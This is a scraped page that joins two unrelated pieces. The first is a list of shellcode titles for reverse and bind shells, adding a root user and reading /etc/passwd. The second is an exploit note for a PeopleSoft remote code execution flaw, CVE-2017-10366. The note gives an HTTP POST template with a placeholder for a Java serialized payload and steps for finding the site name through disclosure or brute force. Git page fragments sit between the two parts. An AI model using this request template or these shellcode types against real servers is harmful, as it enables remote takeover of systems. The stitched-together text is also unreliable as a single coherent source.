Android/ARM - Reverse TCP (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes)

Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)
Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes)

Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)
Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)
Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)
Linux/x86-64 - shutdown -h now Shellcode (65 bytes)
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)
Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)
Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)
Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)

Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)
Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)
Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)
Linux x86 - execve /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)
Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)
Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)
2018-01-16 05:02:18 +00:00

57 lines
No EOL
1.8 KiB
Text
Raw Blame History

# Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56
# Date: 30 Oct 2017
# Exploit Author: Vahagn Vardanyan
# Vendor Homepage: Oracle
# Software Link: Oracle PeopleSoft
# Version: 8.54, 8.55, 8.56
# Tested on: Windows, Linux
# CVE : CVE-2017-10366 https://github.com/vah13/OracleCVE/tree/master/CVE-2017-10366
The RCE vulnerability present in monitor service of PeopleSoft 8.54, 8.55, 8.56.
POST /monitor/%SITE_NAME% HTTP/1.1
Host: PeopleSoft:PORT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0)
Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie:a=aa
§JAVA_SERIAL§
%SITE_NAME% - is a PeopleSoft "name" to get it you can use some information
disclosure or brute force. information for automation detection:
1. If monitor component deployed and you don't know %SITE_NAME% then
will get this type of error
<h2>Site name is not valid. Check your URL syntax and try again.</h2>
1. If %SITE_NAME% is true then you will get this message
PeopleSoft
Ping Test for Monitor Servlet
Ping successful. Site %SITE_NAME% is valid.
1. If monitor don't deployed then you will get this message
Error 404--Not Found
From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:
10.4.5 404 Not Found
The server has not found anything matching the Request-URI. No
indication is given of whether the condition is temporary or
permanent.
If the server does not wish to make this information available to the
client, the status code 403 (Forbidden) can be used instead. The 410
(Gone) status code SHOULD be used if the server knows, through some
internally configurable mechanism, that an old resource is permanently
unavailable and has no forwarding address.
Reference in a new issue View git blame Copy permalink